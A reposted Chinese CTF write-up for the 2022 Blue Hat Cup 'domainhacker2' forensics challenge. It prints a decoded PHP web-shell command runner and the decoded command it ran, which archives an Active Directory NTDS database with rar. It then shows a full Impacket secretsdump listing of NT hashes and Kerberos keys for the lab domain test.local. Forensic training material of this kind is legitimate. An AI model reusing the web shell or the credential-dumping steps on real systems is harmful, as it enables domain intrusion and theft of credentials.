ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 其他分享> 文章详细

CTF-2022 蓝帽杯-Misc-domainhacker2

2022-07-10 12:02:37  阅读:196  来源: 互联网

标签:sha1 cts Misc CTF test domainhacker2 local hmac 96


附件

链接:https://pan.baidu.com/s/1q-9HIdbsARa81dAGXgdpJQ?pwd=msjz
提取码:msjz

思路

与domainhacker一致

<?php
$ret=@runcmd($r." 2>&1");
$r="{$p} {$c}";
$p=base64_decode(substr($_POST["i00fdbe370f732"],2));
$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$s=base64_decode(substr($_POST["eaf06745bcdc2e"],2));

i00fdbe370f732=LcY21k
eaf06745bcdc2e=suY2QgL2QgImM6XFxXaW5kb3dzXFxUZW1wIiZyYXIuZXhlIGEgLVBGYWtlUGFzc3dvcmQxMjMkIG50ZHMucmFyIG5ldyZlY2hvIDFkMzYzMiZjZCZlY2hvIDc4YmM0NjJhYg==

解压缩打开ntds.rar后,使用secretsdump提取出信息即可

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0xf5a55bb9181f33269276949d2ad680e5
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 752aa10b88b269bd735d54b802d5c86c
[*] Reading and decrypting hashes from ./ntds/new/Active Directory/ntds.dit 
test.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:a85016dddda9fe5a980272af8f54f20e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Admin:1001:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
test:1003:aad3b435b51404eeaad3b435b51404ee:4f95f1c5acfc3b972a1ce2a29ef1f1c5:::
PDC$:1004:aad3b435b51404eeaad3b435b51404ee:416f89c3a5deb1d398a1a1fce93862a7:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8d9c46df1a433693842082203898424f:::
EXCHANGE$:1107:aad3b435b51404eeaad3b435b51404ee:8f203498c3054ed0e01efc9d1da10ecd:::
test.local\$731000-68GJ1H3VU01P:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_96e3b8005d5c4140a:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_2e01c85cf3c346a3b:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_70dd52fc546d40e69:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_232124d96e734743a:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_5cbb0f422e264c8a9:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_8795fe36df7a4bf6b:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_c5b767869d8842e5a:1134:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_c648e6ab382f45d1b:1135:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\SM_728e72cf36894b339:1136:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test.local\HealthMailbox2b984a7:1138:aad3b435b51404eeaad3b435b51404ee:90fcf26701d2940adc23490f350e1b1f:::
test.local\HealthMailbox5df812c:1139:aad3b435b51404eeaad3b435b51404ee:ad1b5c6c9f429b9d8da03b2f513bfb21:::
test.local\HealthMailbox3b3738b:1140:aad3b435b51404eeaad3b435b51404ee:5ae4cbd737c56ae1200e27f1613152ef:::
test.local\HealthMailbox92ad4b5:1141:aad3b435b51404eeaad3b435b51404ee:8a72893d2524ec7250665dc774309ef0:::
test.local\HealthMailbox32c7bf8:1142:aad3b435b51404eeaad3b435b51404ee:a6da9aacd86610c09b8092fc80b828d0:::
test.local\HealthMailbox57b62f5:1143:aad3b435b51404eeaad3b435b51404ee:32fa33f6fce1c88d17b0f2461ddc14bf:::
test.local\HealthMailbox18342c7:1144:aad3b435b51404eeaad3b435b51404ee:0ac5b6fd8216905ce1bf6c8728a03eac:::
test.local\HealthMailbox2d4e04f:1145:aad3b435b51404eeaad3b435b51404ee:42b6fb14d0650f80148d5a20dc12f77e:::
test.local\HealthMailbox247d46e:1146:aad3b435b51404eeaad3b435b51404ee:d403e27a987b8bc0e56c74ea4b337d09:::
test.local\HealthMailbox364422e:1147:aad3b435b51404eeaad3b435b51404ee:38716e3d1eabfc27eeffc559d0dffbef:::
test.local\HealthMailboxd9284e9:1148:aad3b435b51404eeaad3b435b51404ee:a355b106550b9ac7871ed534b101a1f6:::
test1:1149:aad3b435b51404eeaad3b435b51404ee:8cbbbea6034f5c9ea6bc4eb980efec4d:::
SDC$:1151:aad3b435b51404eeaad3b435b51404ee:9f40caf799bf0d110fdf08b3bf3eb6c0:::
testnew$:1152:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
WIN-PJ6ELFEG09P$:1153:aad3b435b51404eeaad3b435b51404ee:6533cba50e01cace16567ec5691e587f:::
testcomputer$:1154:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
t$:1155:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
tt$:1156:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
WebApp01$:1157:aad3b435b51404eeaad3b435b51404ee:b021fa4e92913d91a6eade97884f508b:::
aaa:1158:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
[*] Kerberos keys from ./ntds/new/Active Directory/ntds.dit 
test.local\Administrator:aes256-cts-hmac-sha1-96:bf735a3948b1284821574a0044a703548465e61057dd1a7768325e8aad06ae5e
test.local\Administrator:aes128-cts-hmac-sha1-96:bd93e3242d1a346f4d2280ac3c33f965
test.local\Administrator:des-cbc-md5:1f4cef4cabf20298
Admin:aes256-cts-hmac-sha1-96:f3ee9e3911e4dcbd686dc73b2a70c6d7762fff9ffeb304d62410b5f2464a5884
Admin:aes128-cts-hmac-sha1-96:40877736a0a837a3b9563fd4f12e72f5
Admin:des-cbc-md5:cddcea70e6a4c29d
test:aes256-cts-hmac-sha1-96:3a4b7dc7e441d73726adbb1921e79ba65a8895d74887e04df9eaef3869207ee9
test:aes128-cts-hmac-sha1-96:98bf9049e7f51e8e7d8f461aa8d9ec70
test:des-cbc-md5:e3986db31051c154
PDC$:aes256-cts-hmac-sha1-96:3a1cff1c3cbbc08e6c4014cc629f2a3d8a31b6dec5759f6f0859d0bfe6506182
PDC$:aes128-cts-hmac-sha1-96:05de7789ce4233c3fb1117b864cd8644
PDC$:des-cbc-md5:9dadcb61688a2367
krbtgt:aes256-cts-hmac-sha1-96:ce69418e93cd64b771e562ac73ae00b9922fe6c83fa1e82219400e2bb48ed400
krbtgt:aes128-cts-hmac-sha1-96:319f7c87ba483f25f5e4f7b2ee0cf6c1
krbtgt:des-cbc-md5:8a264ad932f23704
EXCHANGE$:aes256-cts-hmac-sha1-96:7998677a5c8ad1934b5a6043b9ffb4e7141412fce5a82358164d26b0b4b0d96a
EXCHANGE$:aes128-cts-hmac-sha1-96:258731ffd04a5d78912db56def015af5
EXCHANGE$:des-cbc-md5:0d10f88043bff491
test.local\HealthMailbox2b984a7:aes256-cts-hmac-sha1-96:2e2c606999ae65c838190eb3e42f268ff2c9e05b562057f4372052e5c418b141
test.local\HealthMailbox2b984a7:aes128-cts-hmac-sha1-96:d496728ddbcd54d5246033fc1e59b191
test.local\HealthMailbox2b984a7:des-cbc-md5:6423fe5eb3b354ce
test.local\HealthMailbox5df812c:aes256-cts-hmac-sha1-96:c7b35baa2d7c75dd729061c98a91262c674068ab46767da9549aa5bc9e0800c7
test.local\HealthMailbox5df812c:aes128-cts-hmac-sha1-96:4c60e6d2265f79ba7578d9e27479dfbf
test.local\HealthMailbox5df812c:des-cbc-md5:b94cb3ba0d927691
test.local\HealthMailbox3b3738b:aes256-cts-hmac-sha1-96:6b463387e784265bde6ea1a73c553d6e8cfe12b22fb1fe0439dd4ccba6784306
test.local\HealthMailbox3b3738b:aes128-cts-hmac-sha1-96:a36192139b393b469db8ecc4401bb5ba
test.local\HealthMailbox3b3738b:des-cbc-md5:ad43043d623eb040
test.local\HealthMailbox92ad4b5:aes256-cts-hmac-sha1-96:2a757f18b3b8d02f9980f9dda081a524e865b2d3a531dcb3c5c146e1cbd7d55a
test.local\HealthMailbox92ad4b5:aes128-cts-hmac-sha1-96:968429cdd9464bcf9e0fde47b136447d
test.local\HealthMailbox92ad4b5:des-cbc-md5:4683e34ca74af710
test.local\HealthMailbox32c7bf8:aes256-cts-hmac-sha1-96:e95d8fd1c2920c19722892bf5e8dfa8846360994f4484c043b04eff000ecd14e
test.local\HealthMailbox32c7bf8:aes128-cts-hmac-sha1-96:1d61443a6254596bd8fb3d697221d710
test.local\HealthMailbox32c7bf8:des-cbc-md5:ef8a4f203e808501
test.local\HealthMailbox57b62f5:aes256-cts-hmac-sha1-96:1713fdd614d9cd173c0b2a54db2d52d013c803bf125584db2c3f163aeaf22c03
test.local\HealthMailbox57b62f5:aes128-cts-hmac-sha1-96:9390dcff5cc2227274a7148e798d0174
test.local\HealthMailbox57b62f5:des-cbc-md5:460d98a4204ab6f2
test.local\HealthMailbox18342c7:aes256-cts-hmac-sha1-96:887d6b5d170b1bac1372631e80a32a732d1ea8985239b48297392aa738a95300
test.local\HealthMailbox18342c7:aes128-cts-hmac-sha1-96:7646f506daa562e686d6c2aefc920b16
test.local\HealthMailbox18342c7:des-cbc-md5:3189bfa47c836d4f
test.local\HealthMailbox2d4e04f:aes256-cts-hmac-sha1-96:57afad1952342893df8277fcc66e8424c77fdedf7bcdc5fc10c1b9ad7e54bdf1
test.local\HealthMailbox2d4e04f:aes128-cts-hmac-sha1-96:1934ccdefa73b2d48f007a97f7720743
test.local\HealthMailbox2d4e04f:des-cbc-md5:15c464a7abb36e5e
test.local\HealthMailbox247d46e:aes256-cts-hmac-sha1-96:219f9c118ae6cc7217e0e3545e39e9bdfb6b207e7c91d8f35cad89bd1ec3ea8b
test.local\HealthMailbox247d46e:aes128-cts-hmac-sha1-96:10b8531f9555d0ecfcc7527d7bc90246
test.local\HealthMailbox247d46e:des-cbc-md5:d07525b029cb6d46
test.local\HealthMailbox364422e:aes256-cts-hmac-sha1-96:a96b346f39ace3cf939d1b8baba23d652405183300911133fae1929cd1869d05
test.local\HealthMailbox364422e:aes128-cts-hmac-sha1-96:5f081757425ad99ea78280bbd8102290
test.local\HealthMailbox364422e:des-cbc-md5:20b51cd623efd558
test.local\HealthMailboxd9284e9:aes256-cts-hmac-sha1-96:bbdb9ddc9c2317044a670859428947f69e082457f41f52e40ce8b05ab9cf79d4
test.local\HealthMailboxd9284e9:aes128-cts-hmac-sha1-96:9860afcea4db56c2c1fcf62a3f827e68
test.local\HealthMailboxd9284e9:des-cbc-md5:1aeaba45202a8fd9
test1:aes256-cts-hmac-sha1-96:255dc456b3fb5c7e0a30af8dc9a6848b2a52632df368848fbe3de66af02a4b39
test1:aes128-cts-hmac-sha1-96:79089681b69f42be4a848f5ba97089e9
test1:des-cbc-md5:f7ce86ba13d5974a
SDC$:aes256-cts-hmac-sha1-96:8ae566481e35184fbe4527e7dd1994ef578d1b2193902a0524d2d7eb521fc546
SDC$:aes128-cts-hmac-sha1-96:dbe510adea502b051456ab9b87b3dcc3
SDC$:des-cbc-md5:796d20cb864cda3e
testnew$:aes256-cts-hmac-sha1-96:3cb7277d0b9a55772d676b05b8e4fe1cef5cf2ac2a771b3694f8140cf251ced2
testnew$:aes128-cts-hmac-sha1-96:ff6f396cde3a83d0f92ba5c41c4398db
testnew$:des-cbc-md5:fbd37375d03e8fef
WIN-PJ6ELFEG09P$:aes256-cts-hmac-sha1-96:6ba5adb397e3b0745e8fc99ec1ef760765fabc72db61aac7fa85180b81255bbc
WIN-PJ6ELFEG09P$:aes128-cts-hmac-sha1-96:dd628a4f9010e06d9e28bdfbb05bba8a
WIN-PJ6ELFEG09P$:des-cbc-md5:85cee3a2e5a1a876
testcomputer$:aes256-cts-hmac-sha1-96:5aab1f9bd51d922662b0fb6629d2f19c021d39ce61ce3e1e0e78c30fe262323f
testcomputer$:aes128-cts-hmac-sha1-96:6d63db940d8a6184c819fe28a2bb941b
testcomputer$:des-cbc-md5:19c2a80d6e86c26b
t$:aes256-cts-hmac-sha1-96:2ecec9c280c2b5a9194a188347f574f978effb1a081788d18336008ff6d82301
t$:aes128-cts-hmac-sha1-96:8db3c242e61039c65cc4ec3e718b4f6e
t$:des-cbc-md5:bc15fd7a4fea73ba
tt$:aes256-cts-hmac-sha1-96:5e29f4025707d663a2f01a37be180eb16aefa1922f33746f884f54d3c3659662
tt$:aes128-cts-hmac-sha1-96:fcbe0e3fb7c4115dd587cf399d80ff8b
tt$:des-cbc-md5:8a153467f7dcba92
WebApp01$:aes256-cts-hmac-sha1-96:694654793ec838d03449774b13614c829cb67e098c6f49d54c2d106dd06f36f7
WebApp01$:aes128-cts-hmac-sha1-96:41dbcb4199062f8e5032c7c389f9671b
WebApp01$:des-cbc-md5:3efbe56e9246fb62
aaa:aes256-cts-hmac-sha1-96:fdca7a6a5d3697843ded80744f15a70492b941e5af1e91bf5ebd5f372a3ce6b4
aaa:aes128-cts-hmac-sha1-96:d853c22fb51e8d65f7eb84a07c7b5a9f
aaa:des-cbc-md5:0d572cfe46a41cf1
[*] Cleaning up...

标签:sha1,cts,Misc,CTF,test,domainhacker2,local,hmac,96
来源: https://www.cnblogs.com/zxcyyyyy000/p/16462928.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有